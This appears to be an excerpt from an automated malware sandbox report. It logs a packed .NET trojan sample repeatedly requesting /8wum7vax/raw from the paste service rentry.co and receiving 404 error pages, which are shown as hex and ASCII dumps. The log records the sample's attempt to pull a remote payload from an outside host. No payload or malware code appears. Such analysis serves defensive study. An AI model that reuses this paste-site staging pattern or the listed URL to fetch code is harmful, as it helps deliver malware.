                                                                                        2024-10-18 10:44:22 UTC690INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:22 UTC1369INData Raw: 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74
                                                                                        Data Ascii: s/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and edit
                                                                                        2024-10-18 10:44:22 UTC1369INData Raw: 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65
                                                                                        Data Ascii: y.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container containe
                                                                                        2024-10-18 10:44:22 UTC1032INData Raw: 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 63 37 31 39 63 39 65 37 61 61 27 2c 74 3a
                                                                                        Data Ascii: t src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eec719c9e7aa',t:
                                                                                        2024-10-18 10:44:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        85192.168.2.660748104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:23 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:24 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:24 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bjQ%2FbmZNAgQSb9sTyeGLTsN%2FA9nLSvvJOLoESREHoBqeG2jUTeC6%2BTyM3L6R6cGM3BMUqDqD3KsjXNBwn75lm3z9Ujpee6cQ5t28tiX100LS8X9ck4lfCwJOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eed11fdae7c3-DFW
                                                                                        2024-10-18 10:44:24 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:24 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:44:24 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:24 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 64 31 31 66 64 61 65 37 63 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 32 4e 43 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eed11fdae7c3',t:'MTcyOTI0ODI2NC4wMDAwMD
                                                                                        2024-10-18 10:44:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        86192.168.2.660749104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:24 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:25 UTC677INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:25 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNbLVg7eYXvLSvgDiCbIQaXo6jbOHfVCnUSXkDxFC9Lu6lShAGvYDRPvwkEWUroDfGgJ%2F8v%2BsykNh8HffeC2KBMFtRoOzqOlWKJVenI8KXIb7gPKFyxvNly34w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eed74be93acf-DFW
                                                                                        2024-10-18 10:44:25 UTC692INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:25 UTC1369INData Raw: 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e
                                                                                        Data Ascii: 512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editin
                                                                                        2024-10-18 10:44:25 UTC1369INData Raw: 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d
                                                                                        Data Ascii: org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-
                                                                                        2024-10-18 10:44:25 UTC1030INData Raw: 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 64 37 34 62 65 39 33 61 63 66 27 2c 74 3a 27 4d
                                                                                        Data Ascii: src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eed74be93acf',t:'M
                                                                                        2024-10-18 10:44:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        87192.168.2.660751104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:25 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:26 UTC652INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:26 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FBvyzIO9cJxVQMYsg9k81213FTF2r2oZevdQcOfKGdKIQFXgzlOfWVPlveEfkU0mePUykUnnXpUAUxV7YH8XSAH1g6bb3qneih6Kerej1pTp4eCTOXTTar2d3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eedd6b6d4612-DFW
                                                                                        2024-10-18 10:44:26 UTC717INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:26 UTC1369INData Raw: 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                        Data Ascii: operty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property
                                                                                        2024-10-18 10:44:26 UTC1369INData Raw: 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                        Data Ascii: pt.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div
                                                                                        2024-10-18 10:44:26 UTC1005INData Raw: 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 64 64 36 62 36 64 34 36 31 32 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 32 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d
                                                                                        Data Ascii: .min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eedd6b6d4612',t:'MTcyOTI0ODI2Ni4wMDAwMDA='}
                                                                                        2024-10-18 10:44:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        88192.168.2.660752104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:26 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:27 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:27 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Utyrslh0KzGH%2FiytxKNPetzVUTPqm1w9%2FJToTqkZ36HX5ndeNHUNhJvWQHYYEJD%2Bno85g4%2BxFxrJJu7AaiWsPlIZI1tKhzSeZoQZDmcRZNHHrH75v1uU8BO1lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eee38b00485b-DFW
